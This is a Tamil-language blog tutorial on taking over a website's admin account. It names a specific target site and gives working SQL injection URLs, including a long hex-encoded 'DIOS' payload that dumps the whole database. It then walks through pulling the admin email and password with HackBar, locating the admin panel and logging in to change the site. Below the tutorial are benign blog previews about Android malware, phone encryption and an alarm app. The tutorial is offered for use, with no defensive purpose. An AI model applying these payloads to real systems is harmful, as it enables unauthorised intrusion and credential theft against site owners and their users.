Website Admin-ன் Email&Password-ஐ Hack செய்வது எப்படி?

-

இன்று நாம் ஒரு Website-ல் உள்ள Admin-ன் Email&Password ஆகியவற்றை எடுத்து அதன் மூலம் அந்த Website-ன் Full access-ஐ பெறுவது என்று பார்ப்போம்


TargetSite http://www.coreworld.in/
இந்த site-ல் SQli vuln உள்ளது.  Site-ல் 5 columns உள்ளது  http://www.coreworld.in/news.php?id=382+ORDER+BY+5--+
http://www.coreworld.in/news.php?id=-382+UNION+ALL+SELECT+1,2,3,4,5--+

Vuln Columns-ஐ கண்டறிய  http://www.coreworld.in/news.php?id=--382+UNION+ALL+SELECT+1,2,3,4,5--+இப்போது 2,3 Vuln Columns ஆகும்.
இப்பொது நாம் Admin Email&Password-ஐ எடுக்க DIOS Method-ஐ பயன்படுத்தலாம்.http://www.coreworld.in/news.php?id=-382+UNION+ALL+SELECT+1,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),3,4,5--+
DIOS Method-ஐ பற்றி ஏற்கனவே பதிவிடப்பட்டுள்ளது..
 DIOS Method-ஐ Execute செய்தவுடன்  மொத்த DATABASE-ம் காட்டும். அதில் admin login என்ற Table இருக்கும். அதில் தான் admin-ன் ID&PWD இருக்கும்.


01:) id
02:) emailid
03:) ipassword
04:) istatus

இப்பொது நாம் அதில் உள்ள DATA-வை Extract செய்து ID&PWD எடுக்க, HACKBAR-ல் DATA என்ற option-ல்>DATA group_concat என்பதை Injection point-ல் உள்ளிடவும்.(Injection Point என்பது VULN Column) Execute கொடுக்கவும்.


 முதலில் ஒரு pop-ல் DATABASE என்றே கொடுக்கவும்.

அடுத்த pop-ல் Table Name கேக்கும் அதில் நமக்கு தேவையான admin-ன் Column-ஐ கொடுக்கவும்.

அடுத்த pop-ல் தேவையான Columns ID&PWD Column Name-ஐ கொடுக்கவும்.
 இப்பொது Execute செய்யவும். admin-ன் ID&PWD காட்டபடும்.


சரி இப்போது நாம் Admin-ன் ID&PWD எடுத்து விட்டோம். அடுத்தது admin login செய்யும்  admin Panel தேவை. அதை கண்டறிய website-ன் link வுடன் admin அல்லது adminlogin என சேர்த்து பார்த்தால் ADMIN PANEL கிடைகும். Admin Panel-எடுப்பதை பற்றி அடுத்த பதிவில் பார்க்கலாம்.
http://www.coreworld.in/admin
http://www.coreworld.in/adminlogin 

இப்போது நமக்கு Admin ID&PWD கிடைத்துவிட்டது. Admin Panel-வும் கிடைத்து விட்டது. Login-ல் ID&PWD கொடுத்து விட்டால் Site-ன் உள்நுழைந்து விடும் 

இனி நமக்கு தேவையான மாற்றங்களை நாம் செய்யலாம்.
                 

Comments

Post a Comment

Popular posts from this blog

“Fakeapp” Android Malware Steals Facebook Credentials

-
Image
This new Android malware steals Facebook data directly from the device Facebook is no stranger to spreading of scams and installation of malicious malware on its platform. Thanks to its large user base, the popular social media networking site has always been the favorite of cybercriminals and hackers. In a newly identified scam detected by security company Symantec, a malicious app dubbed ‘Android.Fakeapp’, involves a new malware strain that is phishing for Facebook login credentials directly from the targeted devices. Once the Facebook user credentials are obtained, the malware logs into the account and collects account information and results using the Facebook mobile app’s search functionality. According to the researchers, the Fakeapp malware is currently made available via malicious apps to English-speaking users on third-party app stores. How does the Fakeapp malware work? Once installed, the apps infected with the Fakeapp malware will immediately hide from ...
Read more

Encrypted smartphones secure your identity, not just your data

-
Image
Smartphones store your email, your photos and your calendar. They provide access to online social media sites like Facebook and Twitter, and even your bank and credit card accounts. And they're keys to something even more private and precious – your digital identity. Through their role in  two-factor authentication  systems, the most commonly used  secure digital identity protection method , smartphones have become essential to identifying people both online and off. If data and apps on smartphones are not secure, that is a threat to people's identities, potentially allowing intruders to pose as their targets on social networks, email, workplace communications and other  online accounts . As recently as 2012, the FBI  recommended the public protect their smartphones' data  by encrypting it. More recently, though,  the agency  has  asked phone makers to provide a way to  get into encrypted devices , what police call "exceptiona...
Read more

அலர வைக்கும் அலாரம்

-
Image
ஸ்மார்ட் போனுக்குள் இருந்தபடி துயிலெழுப்ப உதவும் அலாரம் செயலிகள் தான் எத்தனை வகை. இப்போது அலார்மி எனும் புதியதொரு அலாரம் செயலியும் சேர்ந்திருக்கிறது. உலகிலேயே மிகவும் எரிச்சலுட்டக்கூடிய துயிலெழுப்பும் செயலி என இது தன்னை வர்ணித்துக்கொள்கிறது. இந்த அலாரம் செயலி தினமும் காலையில் துயிலெழுப்பும் நேரத்துக்குச் சரியாக ஒலிக்கும். அந்த வகையில் இது மற்ற செயலிகள் போன்றதுதான். ஆனால் இது ஒலிக்கத் தொடங்கிய பின் இதைச் சாதாரணமாக நிறுத்திவிட முடியாது. போனில் ஒரு ஒளிப்படத்தை எடுத்துப் பதிவேற்றிய பிறகுதான் இது மெளனமாகும். அதுவும் எப்படி தெரியுமா? அலாரம் அமைக்கும்போது நீங்கள் தேர்வு செய்து ஒளிப்படமாக சமர்ப்பித்த இடத்துக்குச் சென்று படமெடுத்தால்தான் இதை நிறுத்த முடியும். அதுவரை கத்திக்கொண்டே இருக்கும்- அதனால் அது தன்னை எரிச்சலூட்டும் செயலி என்கிறது. பொறுப்பாக அலாரம் வைத்துவிட்டு அதைவிடப் பொறுப்பாக அதை அணைத்து விட்டு தூங்கிவிடுபவர்களுக்காக உருவாக்கப்பட்டுள்ளது.
Read more